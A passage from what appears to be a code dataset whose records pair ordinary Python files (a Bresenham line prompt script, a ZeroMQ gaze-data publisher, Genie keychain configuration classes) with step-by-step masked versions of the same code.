async def _run(dlg: SaveFileDialog, mainview, ctrl, doc):\n paths = await mainview.threadmethod(dlg.save)\n if paths is None:\n return\n\n @doc.add_next_tick_callback\n def _toolbarsave():\n with ctrl.action:\n dlg.store(paths, False) # pylint: disable=not-callable\n path = paths if isinstance(paths, (str, Path)) else paths[0]\n if mainview.export(path) and Path(path).exists():\n startfile(path)\n",
"step-ids": [
2,
7,
8,
9,
10
]
}
|
[
2,
7,
8,
9,
10
] |
from GRAFICA_BRESENHAMS import Bresenhams
def main():
x = int(input('INGRESA VALOR PARA X: \n'))
y = int(input('INGRESA VALOR PARA Y: \n'))
x1 = int(input('INGRESA VALOR PARA X1: \n'))
y1 = int(input('INGRESA VALOR PARA Y1: \n'))
Bresenhams(x, y, x1, y1)
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "e75bee4e014aa369131c3e200ce874a8840b5690",
"index": 3573,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n x = int(input('INGRESA VALOR PARA X: \\n'))\n y = int(input('INGRESA VALOR PARA Y: \\n'))\n x1 = int(input('INGRESA VALOR PARA X1: \\n'))\n y1 = int(input('INGRESA VALOR PARA Y1: \\n'))\n Bresenhams(x, y, x1, y1)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n x = int(input('INGRESA VALOR PARA X: \\n'))\n y = int(input('INGRESA VALOR PARA Y: \\n'))\n x1 = int(input('INGRESA VALOR PARA X1: \\n'))\n y1 = int(input('INGRESA VALOR PARA Y1: \\n'))\n Bresenhams(x, y, x1, y1)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from GRAFICA_BRESENHAMS import Bresenhams\n\n\ndef main():\n x = int(input('INGRESA VALOR PARA X: \\n'))\n y = int(input('INGRESA VALOR PARA Y: \\n'))\n x1 = int(input('INGRESA VALOR PARA X1: \\n'))\n y1 = int(input('INGRESA VALOR PARA Y1: \\n'))\n Bresenhams(x, y, x1, y1)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from __future__ import print_function
import zmq
import time
import random
import numpy as np
import msgpack as serializer
port = '42000'
# let the OS choose the IP and PORT
ipc_sub_url = 'tcp://*:*'
ipc_push_url = 'tcp://*:*'
# starting communication threads
zmq_ctx = zmq.Context()
pub_socket = zmq_ctx.socket(zmq.PUB)
pub_socket.bind("tcp://*:%s" % port)
# send messages
while True:
topic = 'test'
thisX = np.random.rand()
thisY = np.random.rand()
testDict = {'gaze':(thisX, thisY)}
pub_socket.send_string(topic, zmq.SNDMORE)
pub_socket.send(serializer.dumps(testDict, use_bin_type=True))
print(testDict)
time.sleep(.02)
|
normal
|
{
"blob_id": "cb469b69bf974d39609f79c4f3be686d8106f971",
"index": 1431,
"step-1": "<mask token>\n",
"step-2": "<mask token>\npub_socket.bind('tcp://*:%s' % port)\nwhile True:\n topic = 'test'\n thisX = np.random.rand()\n thisY = np.random.rand()\n testDict = {'gaze': (thisX, thisY)}\n pub_socket.send_string(topic, zmq.SNDMORE)\n pub_socket.send(serializer.dumps(testDict, use_bin_type=True))\n print(testDict)\n time.sleep(0.02)\n",
"step-3": "<mask token>\nport = '42000'\nipc_sub_url = 'tcp://*:*'\nipc_push_url = 'tcp://*:*'\nzmq_ctx = zmq.Context()\npub_socket = zmq_ctx.socket(zmq.PUB)\npub_socket.bind('tcp://*:%s' % port)\nwhile True:\n topic = 'test'\n thisX = np.random.rand()\n thisY = np.random.rand()\n testDict = {'gaze': (thisX, thisY)}\n pub_socket.send_string(topic, zmq.SNDMORE)\n pub_socket.send(serializer.dumps(testDict, use_bin_type=True))\n print(testDict)\n time.sleep(0.02)\n",
"step-4": "from __future__ import print_function\nimport zmq\nimport time\nimport random\nimport numpy as np\nimport msgpack as serializer\nport = '42000'\nipc_sub_url = 'tcp://*:*'\nipc_push_url = 'tcp://*:*'\nzmq_ctx = zmq.Context()\npub_socket = zmq_ctx.socket(zmq.PUB)\npub_socket.bind('tcp://*:%s' % port)\nwhile True:\n topic = 'test'\n thisX = np.random.rand()\n thisY = np.random.rand()\n testDict = {'gaze': (thisX, thisY)}\n pub_socket.send_string(topic, zmq.SNDMORE)\n pub_socket.send(serializer.dumps(testDict, use_bin_type=True))\n print(testDict)\n time.sleep(0.02)\n",
"step-5": "from __future__ import print_function\nimport zmq\nimport time\nimport random\nimport numpy as np \nimport msgpack as serializer\n\nport = '42000'\n\n# let the OS choose the IP and PORT\nipc_sub_url = 'tcp://*:*'\nipc_push_url = 'tcp://*:*'\n\n# starting communication threads\nzmq_ctx = zmq.Context()\npub_socket = zmq_ctx.socket(zmq.PUB)\npub_socket.bind(\"tcp://*:%s\" % port)\n\n\n# send messages\nwhile True:\n\ttopic = 'test'\n\tthisX = np.random.rand()\n\tthisY = np.random.rand()\n\ttestDict = {'gaze':(thisX, thisY)}\n\tpub_socket.send_string(topic, zmq.SNDMORE)\n\tpub_socket.send(serializer.dumps(testDict, use_bin_type=True))\n\tprint(testDict)\n\ttime.sleep(.02)\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from enum import Enum
# Genie
from genie.decorator import managedattribute
from genie.conf.base import Base, \
DeviceFeature, \
LinkFeature, \
Interface
import genie.conf.base.attributes
from genie.libs.conf.base.feature import consolidate_feature_args
from genie.conf.base.attributes import SubAttributes, \
SubAttributesDict, \
AttributesHelper, \
KeyedSubAttributes
from genie.conf.base.attributes import InterfaceSubAttributes
from genie.libs import parser
from genie.abstract import Lookup
from genie.ops.base import Base as ops_Base
from genie.ops.base import Context
__all__ = ('Keychains', )
# Structure Hierarchy:
# Keychains
# +--DeviceAttributes
# +-- KeyChainAttributes
# | +-- KeyIdAttributes
# +-- KeyChainMacSecAttributes
# | +-- KeyIdAttributes
# +-- KeyChainTunEncAttributes
# +-- KeyIdAttributes
class Keychains(DeviceFeature):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# =============================================
# Device attributes
# =============================================
class DeviceAttributes(genie.conf.base.attributes.DeviceSubAttributes):
# KeyChainAttributes
class KeyChainAttributes(KeyedSubAttributes):
def __init__(self, parent, key):
self.key_chain = key
super().__init__(parent)
# KeyIdAttributes
class KeyIdAttributes(KeyedSubAttributes):
def __init__(self, parent, key):
self.key_id = key
super().__init__(parent)
key_id_attr = managedattribute(name='key_id_attr',
read_only=True,
doc=KeyIdAttributes.__doc__)
@key_id_attr.initter
def key_id_attr(self):
return SubAttributesDict(self.KeyIdAttributes, parent=self)
keychain_attr = managedattribute(name='keychain_attr',
read_only=True,
doc=KeyChainAttributes.__doc__)
@keychain_attr.initter
def keychain_attr(self):
return SubAttributesDict(self.KeyChainAttributes, parent=self)
# KeyChainMacSecAttributes
class KeyChainMacSecAttributes(KeyedSubAttributes):
def __init__(self, parent, key):
self.ms_key_chain = key
super().__init__(parent)
# KeyIdAttributes
class KeyIdAttributes(KeyedSubAttributes):
def __init__(self, parent, key):
self.key_id = key
super().__init__(parent)
key_id_attr = managedattribute(name='key_id_attr',
read_only=True,
doc=KeyIdAttributes.__doc__)
@key_id_attr.initter
def key_id_attr(self):
return SubAttributesDict(self.KeyIdAttributes, parent=self)
ms_keychain_attr = managedattribute(
name='ms_keychain_attr',
read_only=True,
doc=KeyChainMacSecAttributes.__doc__)
@ms_keychain_attr.initter
def ms_keychain_attr(self):
return SubAttributesDict(self.KeyChainMacSecAttributes,
parent=self)
# KeyChainTunEncAttributes
class KeyChainTunEncAttributes(KeyedSubAttributes):
def __init__(self, parent, key):
self.te_key_chain = key
super().__init__(parent)
# KeyIdAttributes
class KeyIdAttributes(KeyedSubAttributes):
def __init__(self, parent, key):
self.key_id = key
super().__init__(parent)
key_id_attr = managedattribute(name='key_id_attr',
read_only=True,
doc=KeyIdAttributes.__doc__)
@key_id_attr.initter
def key_id_attr(self):
return SubAttributesDict(self.KeyIdAttributes, parent=self)
te_keychain_attr = managedattribute(
name='te_keychain_attr',
read_only=True,
doc=KeyChainTunEncAttributes.__doc__)
@te_keychain_attr.initter
def te_keychain_attr(self):
return SubAttributesDict(self.KeyChainTunEncAttributes,
parent=self)
device_attr = managedattribute(name='device_attr',
read_only=True,
doc=DeviceAttributes.__doc__)
@device_attr.initter
def device_attr(self):
return SubAttributesDict(self.DeviceAttributes, parent=self)
# ============ managedattributes ============#
key_id = managedattribute(name='key_id',
default=None,
type=(None, managedattribute.test_istype(str)),
doc='Configure a key')
key_enc_type = managedattribute(name='key_enc_type',
default=None,
type=managedattribute.test_istype(int),
doc='Set key encode type')
key_string = managedattribute(name='key_string',
default=None,
type=(None,
managedattribute.test_istype(str)),
doc='Set key string')
class CRYPTO_ALGO(Enum):
aes_128_cmac = 'aes-128-cmac'
aes_256_cmac = 'aes-256-cmac'
crypto_algo = managedattribute(
name='crypto_algo',
default=None,
type=(None, CRYPTO_ALGO),
doc='Set cryptographic authentication algorithm')
lifetime_start = managedattribute(
name='lifetime_start',
default=None,
type=(None, managedattribute.test_istype(str)),
doc='Set start time for sending lifetime of encryption key')
lifetime_duration = managedattribute(
name='lifetime_duration',
default=None,
type=(None, managedattribute.test_istype(int)),
doc='Set key lifetime duration')
# =========================================================
# build_config
# =========================================================
def build_config(self,
devices=None,
interfaces=None,
links=None,
apply=True,
attributes=None,
**kwargs):
attributes = AttributesHelper(self, attributes)
cfgs = {}
devices, interfaces, links = \
consolidate_feature_args(self, devices, interfaces, links)
for key, sub, attributes2 in attributes.mapping_items('device_attr',
keys=devices,
sort=True):
cfgs[key] = sub.build_config(apply=False, attributes=attributes2)
if apply:
for device_name, cfg in sorted(cfgs.items()):
self.testbed.config_on_devices(cfg, fail_invalid=True)
else:
return cfgs
def build_unconfig(self,
devices=None,
interfaces=None,
links=None,
apply=True,
attributes=None,
**kwargs):
attributes = AttributesHelper(self, attributes)
cfgs = {}
devices, interfaces, links = \
consolidate_feature_args(self, devices, interfaces, links)
for key, sub, attributes2 in attributes.mapping_items('device_attr',
keys=devices,
sort=True):
cfgs[key] = sub.build_unconfig(apply=False, attributes=attributes2)
if apply:
for device_name, cfg in sorted(cfgs.items()):
self.testbed.config_on_devices(cfg, fail_invalid=True)
else:
return cfgs
|
normal
|
{
"blob_id": "6d2581b83a2839dcbc644ca572b05b158d80b58d",
"index": 2479,
"step-1": "<mask token>\n\n\nclass Keychains(DeviceFeature):\n <mask token>\n\n\n class DeviceAttributes(genie.conf.base.attributes.DeviceSubAttributes):\n\n\n class KeyChainAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n keychain_attr = managedattribute(name='keychain_attr', read_only=\n True, doc=KeyChainAttributes.__doc__)\n\n @keychain_attr.initter\n def keychain_attr(self):\n return SubAttributesDict(self.KeyChainAttributes, parent=self)\n\n\n class KeyChainMacSecAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.ms_key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n ms_keychain_attr = managedattribute(name='ms_keychain_attr',\n read_only=True, doc=KeyChainMacSecAttributes.__doc__)\n\n @ms_keychain_attr.initter\n def ms_keychain_attr(self):\n return SubAttributesDict(self.KeyChainMacSecAttributes, parent=self\n )\n\n\n class KeyChainTunEncAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.te_key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n te_keychain_attr = managedattribute(name='te_keychain_attr',\n read_only=True, doc=KeyChainTunEncAttributes.__doc__)\n\n @te_keychain_attr.initter\n def te_keychain_attr(self):\n return SubAttributesDict(self.KeyChainTunEncAttributes, parent=self\n )\n <mask token>\n\n @device_attr.initter\n def device_attr(self):\n return SubAttributesDict(self.DeviceAttributes, parent=self)\n <mask token>\n <mask token>\n <mask token>\n\n\n class CRYPTO_ALGO(Enum):\n aes_128_cmac = 'aes-128-cmac'\n aes_256_cmac = 'aes-256-cmac'\n <mask token>\n <mask token>\n <mask token>\n\n def build_config(self, devices=None, interfaces=None, links=None, apply\n =True, attributes=None, **kwargs):\n attributes = AttributesHelper(self, attributes)\n cfgs = {}\n devices, interfaces, links = consolidate_feature_args(self, devices,\n interfaces, links)\n for key, sub, attributes2 in attributes.mapping_items('device_attr',\n keys=devices, sort=True):\n cfgs[key] = sub.build_config(apply=False, attributes=attributes2)\n if apply:\n for device_name, cfg in sorted(cfgs.items()):\n self.testbed.config_on_devices(cfg, fail_invalid=True)\n else:\n return cfgs\n\n def build_unconfig(self, devices=None, interfaces=None, links=None,\n apply=True, attributes=None, **kwargs):\n attributes = AttributesHelper(self, attributes)\n cfgs = {}\n devices, interfaces, links = consolidate_feature_args(self, devices,\n interfaces, links)\n for key, sub, attributes2 in attributes.mapping_items('device_attr',\n keys=devices, sort=True):\n cfgs[key] = sub.build_unconfig(apply=False, attributes=attributes2)\n if apply:\n for device_name, cfg in sorted(cfgs.items()):\n self.testbed.config_on_devices(cfg, fail_invalid=True)\n else:\n return cfgs\n",
"step-2": "<mask token>\n\n\nclass Keychains(DeviceFeature):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\n class DeviceAttributes(genie.conf.base.attributes.DeviceSubAttributes):\n\n\n class KeyChainAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n keychain_attr = managedattribute(name='keychain_attr', read_only=\n True, doc=KeyChainAttributes.__doc__)\n\n @keychain_attr.initter\n def keychain_attr(self):\n return SubAttributesDict(self.KeyChainAttributes, parent=self)\n\n\n class KeyChainMacSecAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.ms_key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n ms_keychain_attr = managedattribute(name='ms_keychain_attr',\n read_only=True, doc=KeyChainMacSecAttributes.__doc__)\n\n @ms_keychain_attr.initter\n def ms_keychain_attr(self):\n return SubAttributesDict(self.KeyChainMacSecAttributes, parent=self\n )\n\n\n class KeyChainTunEncAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.te_key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n te_keychain_attr = managedattribute(name='te_keychain_attr',\n read_only=True, doc=KeyChainTunEncAttributes.__doc__)\n\n @te_keychain_attr.initter\n def te_keychain_attr(self):\n return SubAttributesDict(self.KeyChainTunEncAttributes, parent=self\n )\n device_attr = managedattribute(name='device_attr', read_only=True, doc=\n DeviceAttributes.__doc__)\n\n @device_attr.initter\n def device_attr(self):\n return SubAttributesDict(self.DeviceAttributes, parent=self)\n key_id = managedattribute(name='key_id', default=None, type=(None,\n managedattribute.test_istype(str)), doc='Configure a key')\n key_enc_type = managedattribute(name='key_enc_type', default=None, type\n =managedattribute.test_istype(int), doc='Set key encode type')\n key_string = managedattribute(name='key_string', default=None, type=(\n None, managedattribute.test_istype(str)), doc='Set key string')\n\n\n class CRYPTO_ALGO(Enum):\n aes_128_cmac = 'aes-128-cmac'\n aes_256_cmac = 'aes-256-cmac'\n crypto_algo = managedattribute(name='crypto_algo', default=None, type=(\n None, CRYPTO_ALGO), doc='Set cryptographic authentication algorithm')\n lifetime_start = managedattribute(name='lifetime_start', default=None,\n type=(None, managedattribute.test_istype(str)), doc=\n 'Set start time for sending lifetime of encryption key')\n lifetime_duration = managedattribute(name='lifetime_duration', default=\n None, type=(None, managedattribute.test_istype(int)), doc=\n 'Set key lifetime duration')\n\n def build_config(self, devices=None, interfaces=None, links=None, apply\n =True, attributes=None, **kwargs):\n attributes = AttributesHelper(self, attributes)\n cfgs = {}\n devices, interfaces, links = consolidate_feature_args(self, devices,\n interfaces, links)\n for key, sub, attributes2 in attributes.mapping_items('device_attr',\n keys=devices, sort=True):\n cfgs[key] = sub.build_config(apply=False, attributes=attributes2)\n if apply:\n for device_name, cfg in sorted(cfgs.items()):\n self.testbed.config_on_devices(cfg, fail_invalid=True)\n else:\n return cfgs\n\n def build_unconfig(self, devices=None, interfaces=None, links=None,\n apply=True, attributes=None, **kwargs):\n attributes = AttributesHelper(self, attributes)\n cfgs = {}\n devices, interfaces, links = consolidate_feature_args(self, devices,\n interfaces, links)\n for key, sub, attributes2 in attributes.mapping_items('device_attr',\n keys=devices, sort=True):\n cfgs[key] = sub.build_unconfig(apply=False, attributes=attributes2)\n if apply:\n for device_name, cfg in sorted(cfgs.items()):\n self.testbed.config_on_devices(cfg, fail_invalid=True)\n else:\n return cfgs\n",
"step-3": "<mask token>\n__all__ = 'Keychains',\n\n\nclass Keychains(DeviceFeature):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\n class DeviceAttributes(genie.conf.base.attributes.DeviceSubAttributes):\n\n\n class KeyChainAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n keychain_attr = managedattribute(name='keychain_attr', read_only=\n True, doc=KeyChainAttributes.__doc__)\n\n @keychain_attr.initter\n def keychain_attr(self):\n return SubAttributesDict(self.KeyChainAttributes, parent=self)\n\n\n class KeyChainMacSecAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.ms_key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n ms_keychain_attr = managedattribute(name='ms_keychain_attr',\n read_only=True, doc=KeyChainMacSecAttributes.__doc__)\n\n @ms_keychain_attr.initter\n def ms_keychain_attr(self):\n return SubAttributesDict(self.KeyChainMacSecAttributes, parent=self\n )\n\n\n class KeyChainTunEncAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.te_key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n te_keychain_attr = managedattribute(name='te_keychain_attr',\n read_only=True, doc=KeyChainTunEncAttributes.__doc__)\n\n @te_keychain_attr.initter\n def te_keychain_attr(self):\n return SubAttributesDict(self.KeyChainTunEncAttributes, parent=self\n )\n device_attr = managedattribute(name='device_attr', read_only=True, doc=\n DeviceAttributes.__doc__)\n\n @device_attr.initter\n def device_attr(self):\n return SubAttributesDict(self.DeviceAttributes, parent=self)\n key_id = managedattribute(name='key_id', default=None, type=(None,\n managedattribute.test_istype(str)), doc='Configure a key')\n key_enc_type = managedattribute(name='key_enc_type', default=None, type\n =managedattribute.test_istype(int), doc='Set key encode type')\n key_string = managedattribute(name='key_string', default=None, type=(\n None, managedattribute.test_istype(str)), doc='Set key string')\n\n\n class CRYPTO_ALGO(Enum):\n aes_128_cmac = 'aes-128-cmac'\n aes_256_cmac = 'aes-256-cmac'\n crypto_algo = managedattribute(name='crypto_algo', default=None, type=(\n None, CRYPTO_ALGO), doc='Set cryptographic authentication algorithm')\n lifetime_start = managedattribute(name='lifetime_start', default=None,\n type=(None, managedattribute.test_istype(str)), doc=\n 'Set start time for sending lifetime of encryption key')\n lifetime_duration = managedattribute(name='lifetime_duration', default=\n None, type=(None, managedattribute.test_istype(int)), doc=\n 'Set key lifetime duration')\n\n def build_config(self, devices=None, interfaces=None, links=None, apply\n =True, attributes=None, **kwargs):\n attributes = AttributesHelper(self, attributes)\n cfgs = {}\n devices, interfaces, links = consolidate_feature_args(self, devices,\n interfaces, links)\n for key, sub, attributes2 in attributes.mapping_items('device_attr',\n keys=devices, sort=True):\n cfgs[key] = sub.build_config(apply=False, attributes=attributes2)\n if apply:\n for device_name, cfg in sorted(cfgs.items()):\n self.testbed.config_on_devices(cfg, fail_invalid=True)\n else:\n return cfgs\n\n def build_unconfig(self, devices=None, interfaces=None, links=None,\n apply=True, attributes=None, **kwargs):\n attributes = AttributesHelper(self, attributes)\n cfgs = {}\n devices, interfaces, links = consolidate_feature_args(self, devices,\n interfaces, links)\n for key, sub, attributes2 in attributes.mapping_items('device_attr',\n keys=devices, sort=True):\n cfgs[key] = sub.build_unconfig(apply=False, attributes=attributes2)\n if apply:\n for device_name, cfg in sorted(cfgs.items()):\n self.testbed.config_on_devices(cfg, fail_invalid=True)\n else:\n return cfgs\n",
"step-4": "from enum import Enum\nfrom genie.decorator import managedattribute\nfrom genie.conf.base import Base, DeviceFeature, LinkFeature, Interface\nimport genie.conf.base.attributes\nfrom genie.libs.conf.base.feature import consolidate_feature_args\nfrom genie.conf.base.attributes import SubAttributes, SubAttributesDict, AttributesHelper, KeyedSubAttributes\nfrom genie.conf.base.attributes import InterfaceSubAttributes\nfrom genie.libs import parser\nfrom genie.abstract import Lookup\nfrom genie.ops.base import Base as ops_Base\nfrom genie.ops.base import Context\n__all__ = 'Keychains',\n\n\nclass Keychains(DeviceFeature):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\n class DeviceAttributes(genie.conf.base.attributes.DeviceSubAttributes):\n\n\n class KeyChainAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n keychain_attr = managedattribute(name='keychain_attr', read_only=\n True, doc=KeyChainAttributes.__doc__)\n\n @keychain_attr.initter\n def keychain_attr(self):\n return SubAttributesDict(self.KeyChainAttributes, parent=self)\n\n\n class KeyChainMacSecAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.ms_key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n ms_keychain_attr = managedattribute(name='ms_keychain_attr',\n read_only=True, doc=KeyChainMacSecAttributes.__doc__)\n\n @ms_keychain_attr.initter\n def ms_keychain_attr(self):\n return SubAttributesDict(self.KeyChainMacSecAttributes, parent=self\n )\n\n\n class KeyChainTunEncAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.te_key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n te_keychain_attr = managedattribute(name='te_keychain_attr',\n read_only=True, doc=KeyChainTunEncAttributes.__doc__)\n\n @te_keychain_attr.initter\n def te_keychain_attr(self):\n return SubAttributesDict(self.KeyChainTunEncAttributes, parent=self\n )\n device_attr = managedattribute(name='device_attr', read_only=True, doc=\n DeviceAttributes.__doc__)\n\n @device_attr.initter\n def device_attr(self):\n return SubAttributesDict(self.DeviceAttributes, parent=self)\n key_id = managedattribute(name='key_id', default=None, type=(None,\n managedattribute.test_istype(str)), doc='Configure a key')\n key_enc_type = managedattribute(name='key_enc_type', default=None, type\n =managedattribute.test_istype(int), doc='Set key encode type')\n key_string = managedattribute(name='key_string', default=None, type=(\n None, managedattribute.test_istype(str)), doc='Set key string')\n\n\n class CRYPTO_ALGO(Enum):\n aes_128_cmac = 'aes-128-cmac'\n aes_256_cmac = 'aes-256-cmac'\n crypto_algo = managedattribute(name='crypto_algo', default=None, type=(\n None, CRYPTO_ALGO), doc='Set cryptographic authentication algorithm')\n lifetime_start = managedattribute(name='lifetime_start', default=None,\n type=(None, managedattribute.test_istype(str)), doc=\n 'Set start time for sending lifetime of encryption key')\n lifetime_duration = managedattribute(name='lifetime_duration', default=\n None, type=(None, managedattribute.test_istype(int)), doc=\n 'Set key lifetime duration')\n\n def build_config(self, devices=None, interfaces=None, links=None, apply\n =True, attributes=None, **kwargs):\n attributes = AttributesHelper(self, attributes)\n cfgs = {}\n devices, interfaces, links = consolidate_feature_args(self, devices,\n interfaces, links)\n for key, sub, attributes2 in attributes.mapping_items('device_attr',\n keys=devices, sort=True):\n cfgs[key] = sub.build_config(apply=False, attributes=attributes2)\n if apply:\n for device_name, cfg in sorted(cfgs.items()):\n self.testbed.config_on_devices(cfg, fail_invalid=True)\n else:\n return cfgs\n\n def build_unconfig(self, devices=None, interfaces=None, links=None,\n apply=True, attributes=None, **kwargs):\n attributes = AttributesHelper(self, attributes)\n cfgs = {}\n devices, interfaces, links = consolidate_feature_args(self, devices,\n interfaces, links)\n for key, sub, attributes2 in attributes.mapping_items('device_attr',\n keys=devices, sort=True):\n cfgs[key] = sub.build_unconfig(apply=False, attributes=attributes2)\n if apply:\n for device_name, cfg in sorted(cfgs.items()):\n self.testbed.config_on_devices(cfg, fail_invalid=True)\n else:\n return cfgs\n",
"step-5": "from enum import Enum\n\n# Genie\nfrom genie.decorator import managedattribute\nfrom genie.conf.base import Base, \\\n DeviceFeature, \\\n LinkFeature, \\\n Interface\nimport genie.conf.base.attributes\nfrom genie.libs.conf.base.feature import consolidate_feature_args\nfrom genie.conf.base.attributes import SubAttributes, \\\n SubAttributesDict, \\\n AttributesHelper, \\\n KeyedSubAttributes\nfrom genie.conf.base.attributes import InterfaceSubAttributes\nfrom genie.libs import parser\nfrom genie.abstract import Lookup\nfrom genie.ops.base import Base as ops_Base\nfrom genie.ops.base import Context\n\n__all__ = ('Keychains', )\n# Structure Hierarchy:\n# Keychains\n# +--DeviceAttributes\n# +-- KeyChainAttributes\n# | +-- KeyIdAttributes\n# +-- KeyChainMacSecAttributes\n# | +-- KeyIdAttributes\n# +-- KeyChainTunEncAttributes\n# +-- KeyIdAttributes\n\n\nclass Keychains(DeviceFeature):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # =============================================\n # Device attributes\n # =============================================\n class DeviceAttributes(genie.conf.base.attributes.DeviceSubAttributes):\n\n # KeyChainAttributes\n class KeyChainAttributes(KeyedSubAttributes):\n def __init__(self, parent, key):\n self.key_chain = key\n super().__init__(parent)\n\n # KeyIdAttributes\n class KeyIdAttributes(KeyedSubAttributes):\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n\n key_id_attr = managedattribute(name='key_id_attr',\n read_only=True,\n doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n\n keychain_attr = managedattribute(name='keychain_attr',\n read_only=True,\n doc=KeyChainAttributes.__doc__)\n\n @keychain_attr.initter\n def keychain_attr(self):\n return SubAttributesDict(self.KeyChainAttributes, parent=self)\n\n # KeyChainMacSecAttributes\n class KeyChainMacSecAttributes(KeyedSubAttributes):\n def __init__(self, parent, key):\n self.ms_key_chain = key\n super().__init__(parent)\n\n # KeyIdAttributes\n class 